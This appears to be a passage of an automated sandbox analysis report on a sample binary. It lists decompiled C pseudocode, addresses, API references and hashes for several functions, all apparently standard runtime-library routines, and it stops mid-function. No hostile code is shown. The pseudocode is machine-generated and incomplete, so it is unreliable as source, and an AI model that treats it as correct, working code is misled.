0x0042a8e7
0x0042a8ed
0x0042a8f0
0x0042a8f0
0x0042a8be
0x0042a8ff
0x0042a907
0x0042a90d
0x0042a910
0x0042a85d
0x0042a863
0x0042a86d
0x0042a87f
0x0042a886
0x0042a893
0x00000000
0x0042a893
0x00000000
0x0042a85b
0x0042a6b6
0x0042a62e
0x0042a62e
0x0042a898
0x0042a89b
0x0042a89c
0x0042a89d
0x0042a89f
0x0042a8a6
0x0042a8a6
0x00000000
0x0042a62c
0x0042a625
0x0042a627
0x0042a627
0x00000000
0x0042a627
0x0042a3de
0x0042a3de
0x0042a3e1
0x0042a3e6
0x0042a54e
0x00000000
0x0042a3ec
0x0042a3ee
0x0042a3f6
0x0042a3fc
0x0042a3fd
0x0042a403
0x0042a404
0x0042a409
0x0042a40f
0x0042a412
0x0042a414
0x0042a416
0x0042a417
0x0042a417
0x0042a425
0x0042a425
0x0042a428
0x0042a42b
0x0042a42d
0x0042a430
0x0042a432
0x0042a432
0x0042a435
0x0042a435
0x0042a438
0x0042a43b
0x00000000
0x0042a441
0x0042a441
0x0042a443
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a443
0x0042a43b
0x0042a3e6
0x0042a3d8
0x0042a3ab
0x0042a3ad
0x0042a3ae
0x0042a3b1
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a3b1
0x0042a3a9
0x0042a331
0x00000000
0x0042a325
0x0042a449
0x00000000
0x0042a449
0x0042a2f8
0x0042a2ed
0x0042a2e2
0x0042a29b
0x0042a29b
0x0042a29d
0x0042a2b4
0x0042a29f
0x0042a29f
0x0042a2a0
0x0042a2a1
0x0042a2a2
0x0042a2a7
0x0042a53f
0x0042a542
0x0042a543
0x0042a544
0x0042a546
0x0042a54d
0x0042a54d
0x0042a299
0x00000000

APIs

Part of subcall function 0042E2FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,0043753F,004515E8,00000018,00000003,00451608,00000028,0042B9E6,00000016,0042DACC), ref: 0042E32E

_free.LIBCMT ref: 0042A1E4
_free.LIBCMT ref: 0042A1FB
_free.LIBCMT ref: 0042A218
_free.LIBCMT ref: 0042A233
_free.LIBCMT ref: 0042A24A

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: a696a8386a7be24814d8efcdfbef68f8c4d8f80a6d0c0c1b91a166098ecca38b
Instruction ID: b9af7a40b96a16661791549d1c6ec6967cc0c98bfb4928e2e85993c71bc83608
Opcode Fuzzy Hash: a696a8386a7be24814d8efcdfbef68f8c4d8f80a6d0c0c1b91a166098ecca38b
Instruction Fuzzy Hash: E851E132B00214EFDB10DF6AE841B6AB3F4EF44724F5005AEE805D7351E739D9218B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF7E Relevance: 7.7, APIs: 5, Instructions: 178
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E0040EF7E(void* __ebx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char* _v20;
				void* __esi;
				char _t58;
				void* _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				intOrPtr* _t69;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t89;
				signed int _t90;
				signed int _t93;
				signed int _t96;
				void* _t103;
				char* _t109;
				char* _t115;
				char* _t118;
				intOrPtr* _t120;
				signed int* _t121;

				_t108 = __ebx;
				_t109 =  *0x456018; // 0x0
				_v12 = 0;
				_v8 = 0;
				_t58 =  *_t109;
				if(_t58 == 0) {
					L15:
					E0040AE84(_t109, _a4, 1, _a8);
					L16:
					L17:
					return _a4;
				}
				_t61 = _t58 - 0x24;
				if(_t61 == 0) {
					_t62 =  *((intOrPtr*)(_t109 + 1));
					__eflags = _t62 - 0x24;
					if(_t62 == 0x24) {
						_t109 = _t109 + 2;
						 *0x456018 = _t109;
						_t63 =  *_t109;
						__eflags = _t63 - 0x52;
						if(__eflags > 0) {
							_t64 = _t63 - 0x53;
							__eflags = _t64;
							if(_t64 == 0) {
								_t56 = _t109 + 1; // -1
								 *0x456018 = _t56;
								L39:
								E0040AAF4(_a4, 2);
								goto L17;
							}
							_t67 = _t64 - 1;
							__eflags = _t67;
							if(_t67 == 0) {
								_t46 = _t109 + 1; // -1
								 *0x456018 = _t46;
								_t69 = _a8;
								__eflags =  *_t69;
								if( *_t69 == 0) {
									_v20 = "std::nullptr_t";
									_v16 = 0xe;
									E0040AA52(_a4,  &_v20);
									goto L17;
								}
								_v20 = "std::nullptr_t ";
								_v16 = 0xf;
								E0040AE37(_t109, _a4,  &_v20, _t69);
								goto L16;
							}
							_t75 = _t67;
							__eflags = _t75;
							if(_t75 == 0) {
								_t120 = _a8;
								_t42 = _t109 + 1; // -1
								 *0x456018 = _t42;
								_t77 = _a4;
								 *_t77 =  *_t120;
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t120 + 4));
								return _t77;
							}
							__eflags = _t75 - 3;
							if(__eflags == 0) {
								_t40 = _t109 + 1; // -1
								 *0x456018 = _t40;
								E0040F978(0, __eflags, _a4);
								L6:
								goto L17;
							}
							goto L39;
						}
						_t121 = _a8;
						if(__eflags == 0) {
							_t115 =  &_v12;
							_push( &_v20);
							__eflags =  *_t121;
							if( *_t121 == 0) {
								_v20 = "volatile";
								_v16 = 8;
							} else {
								_v20 = "volatile ";
								_v16 = 9;
							}
							E0040AD2C(_t115);
							_t109 =  *0x456018; // 0x0
							L34:
							_push(3);
							L12:
							_v20 =  *_t121;
							 *0x456018 = _t109 + 1;
							_v16 =  *(_t121 + 4) | 0x00000100;
							_push( &_v20);
							_push( &_v12);
							_push(_a4);
							E0040F339(_t108, 0);
							goto L17;
						}
						_t89 = _t63;
						__eflags = _t89;
						if(_t89 == 0) {
							goto L15;
						}
						_t90 = _t89 - 0x41;
						__eflags = _t90;
						if(_t90 == 0) {
							_t31 = _t109 + 1; // -1
							 *0x456018 = _t31;
							E0040DF52(0, _a4, _t121);
							L5:
							goto L6;
						}
						_t93 = _t90 - 1;
						__eflags = _t93;
						if(_t93 == 0) {
							_t29 = _t109 + 1; // -1
							 *0x456018 = _t29;
							E0040F1CC(__ebx, _t121, _a4, _t121, 1);
							goto L16;
						}
						_t96 = _t93 - 1;
						__eflags = _t96;
						if(_t96 == 0) {
							_t22 = _t109 + 1; // -1
							_v20 = 0;
							 *0x456018 = _t22;
							_v16 = 0;
							E0040C634(_a4, E0040CD62( &_v12, _t121, 0,  &_v20, 0));
							goto L17;
						}
						__eflags = _t96 == 0xe;
						if(_t96 == 0xe) {
							goto L34;
						}
						goto L39;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						goto L39;
					}
					goto L15;
				}
				_t121 = _a8;
				_t103 = _t61 - 0x1d;
				if(_t103 == 0) {
					L11:
					_push(2);
					goto L12;
				}
				if(_t103 == 1) {
					_t118 =  &_v12;
					_push( &_v20);
					__eflags =  *_t121;
					if( *_t121 == 0) {
						_v20 = "volatile";
						_v16 = 8;
					} else {
						_v20 = "volatile ";
						_v16 = 9;
					}
					E0040AD2C(_t118);
					_t109 =  *0x456018; // 0x0
					goto L11;
				}
				E0040C634(_a4, _t121);
				goto L5;
			}

0x0040ef7e
0x0040ef84
0x0040ef8d
0x0040ef90
0x0040ef96
0x0040ef98
0x0040f031
0x0040f039
0x0040f03e
0x0040f041
0x00000000
0x0040f041
0x0040ef9e
0x0040efa1
0x0040f022
0x0040f025
0x0040f027
0x0040f047
0x0040f04a
0x0040f050
0x0040f053
0x0040f056
0x0040f117
0x0040f117
0x0040f11a
0x0040f1bf
0x0040f1c2
0x0040f130
0x0040f135
0x00000000
0x0040f135
0x0040f120
0x0040f120
0x0040f123
0x0040f171
0x0040f174
0x0040f179
0x0040f17c
0x0040f17e
0x0040f1a7
0x0040f1ae
0x0040f1b5
0x00000000
0x0040f1b5
0x0040f184
0x0040f18f
0x0040f196
0x00000000
0x0040f196
0x0040f126
0x0040f126
0x0040f129
0x0040f154
0x0040f157
0x0040f15a
0x0040f15f
0x0040f164
0x0040f169
0x00000000
0x0040f169
0x0040f12b
0x0040f12e
0x0040f142
0x0040f145
0x0040f14a
0x0040efba
0x00000000
0x0040efba
0x00000000
0x0040f12e
0x0040f05c
0x0040f05f
0x0040f0df
0x0040f0e2
0x0040f0e3
0x0040f0e5
0x0040f0f7
0x0040f0fe
0x0040f0e7
0x0040f0e7
0x0040f0ee
0x0040f0ee
0x0040f105
0x0040f10a
0x0040f110
0x0040f110
0x0040eff6
0x0040eff9
0x0040f004
0x0040f00a
0x0040f010
0x0040f014
0x0040f015
0x0040f018
0x00000000
0x0040f01d
0x0040f061
0x0040f061
0x0040f063
0x00000000
0x00000000
0x0040f065
0x0040f065
0x0040f068
0x0040f0ca
0x0040f0cd
0x0040f0d2
0x0040efb9
0x00000000
0x0040efb9
0x0040f06a
0x0040f06a
0x0040f06d
0x0040f0b4
0x0040f0b7
0x0040f0bc
0x00000000
0x0040f0bc
0x0040f06f
0x0040f06f
0x0040f072
0x0040f082
0x0040f085
0x0040f089
0x0040f096
0x0040f0a4
0x00000000
0x0040f0a9
0x0040f074
0x0040f077
0x00000000
0x00000000
0x00000000
0x0040f07d
0x0040f029
0x0040f02b
0x00000000
0x00000000
0x00000000
0x0040f02b
0x0040efa3
0x0040efa6
0x0040efa9
0x0040eff4
0x0040eff4
0x00000000
0x0040eff4
0x0040efae
0x0040efc3
0x0040efc6
0x0040efc7
0x0040efc9
0x0040efdb
0x0040efe2
0x0040efcb
0x0040efcb
0x0040efd2
0x0040efd2
0x0040efe9
0x0040efee
0x00000000
0x0040efee
0x0040efb4
0x00000000

APIs

shared_ptr.LIBCMT ref: 0040EFE9
operator+.LIBVCRUNTIME ref: 0040F039
shared_ptr.LIBCMT ref: 0040F105
DName::DName.LIBVCRUNTIME ref: 0040F135
operator+.LIBVCRUNTIME ref: 0040F196

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: operator+shared_ptr$NameName::
String ID:
API String ID: 2894330373-0
Opcode ID: 9efd6665cd6caf5b03ddb72ead881f83b980dd182cd63b0bc3c78092269c00b5
Instruction ID: df3578cf9c296b7a4c2027747ce7306d48605f18f89311659917fb02dc7fa3df
Opcode Fuzzy Hash: 9efd6665cd6caf5b03ddb72ead881f83b980dd182cd63b0bc3c78092269c00b5
Instruction Fuzzy Hash: 8D61A27080020AEEDB24CF65C8449AA7BB5FB04304F14817BE419AB792D779DA4ADF89

Uniqueness

Uniqueness Score: -1.00%

Function 00404330 Relevance: 7.6, APIs: 5, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404330(void* __eax, void* _a4, signed int _a8, void* _a12) {
				char* _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				int _v20;
				int _v24;
				int _t29;
				char* _t33;

				_v12 = 0;
				_v16 = 0;
				if(_a8 == 0) {
					return __eax;
				}
				_t29 = WriteConsoleW(_a12, _a4, _a8,  &_v12, 0);
				_v16 = _t29;
				if(_v16 == 0) {
					_v20 = 0;
					if( *0x454c38 != 0) {
						return WriteFile(_a12, _a4, _a8 << 1,  &_v12, 0);
					}
					_t33 = E00405880();
					_v8 = _t33;
					if(_v8 != 0) {
						_v24 = WideCharToMultiByte(GetConsoleOutputCP(), 0, _a4, _a8, _v8, 0xffff, "?",  &_v20);
						return WriteFile(_a12, _v8, _v24,  &_v12, 0);
					}
					return _t33;
				}
				return _t29;
			}

0x00404336
0x0040433d
0x00404348
0x00000000
0x00000000
0x00404361
0x00404367
0x0040436e
0x00404374
0x00404382
0x00000000
0x004043ee
0x00404384
0x00404389
0x00404390
0x004043bd
0x00000000
0x004043d2
0x00000000
0x00404390
0x004043f7

APIs

WriteConsoleW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00404361

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ConsoleWrite
String ID:
API String ID: 2657657451-0
Opcode ID: 37b7613862320f2274d4b2d98809acc035491a266a0b84848e91ba0b690d6cc9
Instruction ID: 3b493785d0ec8890365df0c4b3b9226c3c08a5f729831bca8d86c833937b2744
Opcode Fuzzy Hash: 37b7613862320f2274d4b2d98809acc035491a266a0b84848e91ba0b690d6cc9
Instruction Fuzzy Hash: 9D21FAB5A00209FFDB04DF98C848FEF77B8EB98301F108169FA15A7280D7789A44DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0043FD3E Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0043FD3E(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t17;
				signed int _t19;
				void* _t21;
				union _LARGE_INTEGER* _t25;

				_t25 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t19 = E0042C0FF(GetLastError());
					L7:
					return _t19 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t17 = SetFilePointerEx(_a4, _a8, _t25,  &_v12);
				__eflags = _t17;
				if(_t17 == 0) {
					goto L1;
				}
				_t21 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t19 = E0042C135(__eflags);
						 *_t19 = 0x16;
						goto L7;
					}
					__eflags = _t21 - 0x7fffffff;
					if(__eflags > 0) {
						goto L6;
					}
				}
				return _t21;
			}

0x0043fd3e
0x0043fd4a
0x0043fd5c
0x0043fd5e
0x0043fd65
0x0043fdba
0x00000000
0x0043fdba
0x0043fd6d
0x0043fd77
0x0043fd7d
0x0043fd80
0x0043fd83
0x0043fd89
0x0043fd8b
0x00000000
0x00000000
0x0043fd8d
0x0043fd90
0x0043fd93
0x0043fd95
0x0043fd9e
0x0043fd9e
0x0043fda9
0x0043fdaf
0x0043fdb4
0x00000000
0x0043fdb4
0x0043fd97
0x0043fd9c
0x00000000
0x00000000
0x0043fd9c
0x0043fdbf

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 0043FD54
GetLastError.KERNEL32(?,?,?), ref: 0043FD5E
__dosmaperr.LIBCMT ref: 0043FD65
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 0043FD83
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0043FDA9

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: 2f030e89b157f00f8f461c37795b1a0501188bb1596660e6994b58c84b209152
Instruction ID: c4350614a36ebd3c39c4253c1a16b3e5df327b380ee4ad5c9cd9fdf040a15213
Opcode Fuzzy Hash: 2f030e89b157f00f8f461c37795b1a0501188bb1596660e6994b58c84b209152
Instruction Fuzzy Hash: 33018C76D00128BBCF20AFA5DC099EF7F7DEF05761F004126F826921A0CB358A40EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00434C54 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00434C54(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x454980; // 0x4549d4
					if(_t23 != 0) {
						E0042E2C2(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x454984; // 0x456e9c
					if(_t24 != 0) {
						E0042E2C2(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x454988; // 0x456e9c
					if(_t25 != 0) {
						E0042E2C2(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x4549b0; // 0x4549d8
					if(_t26 != 0) {
						E0042E2C2(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x4549b4; // 0x456ea0
					if(_t27 != 0) {
						return E0042E2C2(_t6);
					}
				}
				return _t6;
			}

0x00434c5a
0x00434c5f
0x00434c63
0x00434c69
0x00434c6c
0x00434c71
0x00434c75
0x00434c7b
0x00434c7e
0x00434c83
0x00434c87
0x00434c8d
0x00434c90
0x00434c95
0x00434c99
0x00434c9f
0x00434ca2
0x00434ca7
0x00434ca8
0x00434cab
0x00434cb1
0x00000000
0x00434cb9
0x00434cb1
0x00434cbc

APIs

_free.LIBCMT ref: 00434C6C

Part of subcall function 0042E2C2: HeapFree.KERNEL32(00000000,00000000,?,0042B259), ref: 0042E2D8
Part of subcall function 0042E2C2: GetLastError.KERNEL32(?,?,0042B259), ref: 0042E2EA

_free.LIBCMT ref: 00434C7E
_free.LIBCMT ref: 00434C90
_free.LIBCMT ref: 00434CA2
_free.LIBCMT ref: 00434CB4

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dfcd8ac5276be6c90cd880ba9db85b30108f9907cc1101da0e8e2a33c59921e7
Instruction ID: 821d5c6dd746a28e40da5dc27001a6ca5cbd3ab337dad745de7ba8b13339e507
Opcode Fuzzy Hash: dfcd8ac5276be6c90cd880ba9db85b30108f9907cc1101da0e8e2a33c59921e7
Instruction Fuzzy Hash: 24F044B3706610AB8520DB6FF582C5777DDAE84735B96680AF049D7642CB28FC804A6C

Uniqueness

Uniqueness Score: -1.00%

Function 004299E7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 355
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004299E7(signed int __edx, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, signed int* _a24) {
				signed int _v8;
				intOrPtr _v20;
				char _v180;
				short _v202;
				short _v204;
				short _v206;
				signed short _v208;
				signed short _v210;
				signed short _v212;
				char _v468;
				signed int* _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int* _v488;
				signed int _v492;
				signed int _v496;
				char _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				signed int _t101;
				signed short _t102;
				signed short _t104;
				signed int _t106;
				void* _t109;
				signed int _t110;
				signed int _t114;
				intOrPtr _t119;
				signed int _t127;
				signed int _t129;
				signed short _t133;
				signed int _t135;
				char* _t136;
				signed int _t137;
				intOrPtr _t140;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				signed int* _t153;
				void* _t154;
				signed int* _t160;
				void* _t162;
				void* _t164;
				intOrPtr* _t176;
				signed int _t177;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr* _t185;
				signed int* _t189;
				signed int _t191;
				signed int _t192;
				signed int* _t193;
				signed int* _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;

				_t191 = __edx;
				_t83 =  *0x454264; // 0x8c4320d5
				_v8 = _t83 ^ _t197;
				_t149 = _a8;
				_t195 = _a4;
				_v488 = _a24;
				_t86 = 0;
				_v496 = _t149;
				_t192 = _a16;
				if(_t195 == 0) {
					L70:
					return E004085C2(_t86, _t149, _v8 ^ _t197, _t191, _t192, _t195);
				} else {
					_v484 = 0;
					if( *_t195 != 0x43 || _t195[0] != 0) {
						_t89 = E0042DA10(_t154, _t191) + 0x50;
						_t13 = _t89 + 0x18; // -56
						_v472 = _t13;
						_t15 = _t89 + 0x122; // 0xd2
						_t150 = _t15;
						_t16 = _t89 + 0x1c; // -52
						_v476 = _t150;
						_v480 = _t16;
						E004292C9(_t150,  &_v512, _t192, _t192, _a20, E0042DA10(_t154, _t191) + 0x50);
						_t193 = _t195;
						_t191 = 0;
						__eflags = 0;
						_t160 =  &(_t193[0]);
						do {
							_t91 =  *_t193;
							_t193 =  &(_t193[0]);
							__eflags = _t91;
						} while (_t91 != 0);
						_t192 = _t193 - _t160 >> 1;
						_v492 = _t192;
						__eflags = _t192 - 0x83;
						if(_t192 >= 0x83) {
							L24:
							_t92 = E0042D0CC();
							__eflags = _t92;
							_t152 = 0 | _t92 == 0x00000000;
							_t94 = E004297A2(_t152, _t160, _t191, _t192,  &_v468, _t195);
							_pop(_t162);
							__eflags = _t94;
							if(_t94 != 0) {
								_t153 = _v472;
								goto L33;
							} else {
								_t136 =  &_v468;
								__eflags = _t152;
								_t153 = _v472;
								_push(_t136);
								_push(_t153);
								_push(_t136);
								if(__eflags == 0) {
									_t137 = E00436171(_t162, _t191, __eflags);
								} else {
									_t137 = E00436AF0(_t162, _t191, __eflags);
								}
								_t198 = _t198 + 0xc;
								__eflags = _t137;
								if(_t137 == 0) {
									L33:
									_t95 = E0042CE29(_t195);
									_push(_t195);
									__eflags = _t95;
									if(_t95 == 0) {
										_push( &_v468);
										_t97 = E0042A97C();
										_pop(_t164);
										__eflags = _t97;
										if(_t97 == 0) {
											L67:
											__eflags = 0;
											_t149 = 0;
											goto L68;
										} else {
											_t101 = E0042CE29( &_v180);
											__eflags = _t101;
											if(_t101 == 0) {
												goto L67;
											} else {
												_t102 = _v212;
												__eflags = _t102;
												if(_t102 == 0) {
													_t104 = E0042A94D(_t164,  &_v180);
													goto L55;
												} else {
													_t182 = _t102 & 0x0000ffff;
													__eflags = _t182 - 0x41 - 0x19;
													if(_t182 - 0x41 <= 0x19) {
														_t182 = _t182 + 0x20;
														__eflags = _t182;
													}
													_t191 = 0x38;
													__eflags = _t182 - 0x75;
													if(_t182 != 0x75) {
														L50:
														__eflags = _v206 - 0x2d;
														if(_v206 != 0x2d) {
															goto L67;
														} else {
															__eflags = _v204 - _t191;
															if(_v204 != _t191) {
																goto L67;
															} else {
																__eflags = _v202;
																if(_v202 != 0) {
																	goto L67;
																} else {
																	goto L53;
																}
															}
														}
													} else {
														_t183 = _v210 & 0x0000ffff;
														__eflags = _t183 - 0x41 - 0x19;
														if(_t183 - 0x41 <= 0x19) {
															_t183 = _t183 + 0x20;
															__eflags = _t183;
														}
														__eflags = _t183 - 0x74;
														if(_t183 != 0x74) {
															goto L50;
														} else {
															_t184 = _v208 & 0x0000ffff;
															__eflags = _t184 - 0x41 - 0x19;
															if(_t184 - 0x41 <= 0x19) {
																_t184 = _t184 + 0x20;
																__eflags = _t184;
															}
															__eflags = _t184 - 0x66;
															if(_t184 != 0x66) {
																goto L50;
															} else {
																__eflags = _v206 - _t191;
																if(_v206 != _t191) {
																	goto L50;
																} else {
																	__eflags = _v204;
																	if(_v204 == 0) {
																		L53:
																		_t104 = 0xfde9;
																		L55:
																		_t192 = _t192 + 1;
																		_push(_t192);
																		 *_t153 = _t104 & 0x0000ffff;
																		_t149 = _v476;
																		_t106 = E00430A09(_t149, 0x83, _t195);
																		_t198 = _t198 + 0x10;
																		__eflags = _t106;
																		if(_t106 != 0) {
																			goto L71;
																		} else {
																			_t176 =  &_v180;
																			_t191 = _t176 + 2;
																			do {
																				_t119 =  *_t176;
																				_t176 = _t176 + 2;
																				__eflags = _t119 - _v484;
																			} while (_t119 != _v484);
																			_t177 = _t176 - _t191;
																			__eflags = _t177;
																			_push((_t177 >> 1) + 1);
																			_push( &_v180);
																			goto L59;
																		}
																	} else {
																		goto L50;
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t133 = E0042A94D(_t162);
										_t192 = _t192 + 1;
										_push(_t192);
										 *_t153 = _t133 & 0x0000ffff;
										_t149 = _v476;
										_t135 = E00430A09(_t149, 0x83, _t195);
										_t198 = _t198 + 0x14;
										__eflags = _t135;
										if(_t135 != 0) {
											goto L71;
										} else {
											_push(_t192);
											_push(_t195);
											L59:
											E004295A7( &_v512, _t195);
											goto L60;
										}
									}
								} else {
									_t149 = _v476;
									_push( &_v468);
									E00429732(_t149, _t162, _t191, _t192, _t149, 0x83);
									_t185 =  &_v180;
									_t198 = _t198 + 0xc;
									_t191 = _t185 + 2;
									do {
										_t140 =  *_t185;
										_t185 = _t185 + 2;
										__eflags = _t140 - _v484;
									} while (_t140 != _v484);
									E004295EB( &_v512, _t195,  &_v180, (_t185 - _t191 >> 1) + 1);
									_t192 = _t192 + 1;
									L60:
									__eflags =  *_t195;
									if( *_t195 == 0) {
										L64:
										__eflags = 0;
										 *_v480 = 0;
										goto L65;
									} else {
										__eflags = _v492 - 0x83;
										if(_v492 >= 0x83) {
											goto L64;
										} else {
											_push(_t192);
											_t129 = E00430A09(_v480, 0x83, _t195);
											_t198 = _t198 + 0x10;
											__eflags = _t129;
											if(_t129 == 0) {
												goto L65;
											} else {
												goto L71;
											}
										}
									}
								}
							}
						} else {
							_t189 = _t195;
							_t144 = _t150;
							while(1) {
								_t191 =  *_t144;
								__eflags = _t191 -  *_t189;
								if(_t191 !=  *_t189) {
									break;
								}
								__eflags = _t191;
								if(_t191 == 0) {
									L13:
									_t145 = 0;
								} else {
									_t191 =  *((intOrPtr*)(_t144 + 2));
									__eflags = _t191 - _t189[0];
									if(_t191 != _t189[0]) {
										break;
									} else {
										_t144 = _t144 + 4;
										_t189 =  &(_t189[1]);
										__eflags = _t191;
										if(_t191 != 0) {
											continue;
										} else {
											goto L13;
										}
									}
								}
								L15:
								__eflags = _t145;
								if(_t145 == 0) {
									L65:
									 *_v488 =  *_v472;
									_t127 = E004308DA(_v496, _a12, _t149);
									__eflags = _t127;
									if(_t127 != 0) {
										goto L71;
									} else {
										L68:
										E00429349( &_v512);
										goto L69;
									}
								} else {
									_t146 = _v480;
									_t160 = _t195;
									while(1) {
										_t191 =  *_t146;
										__eflags = _t191 -  *_t160;
										if(_t191 !=  *_t160) {
											break;
										}
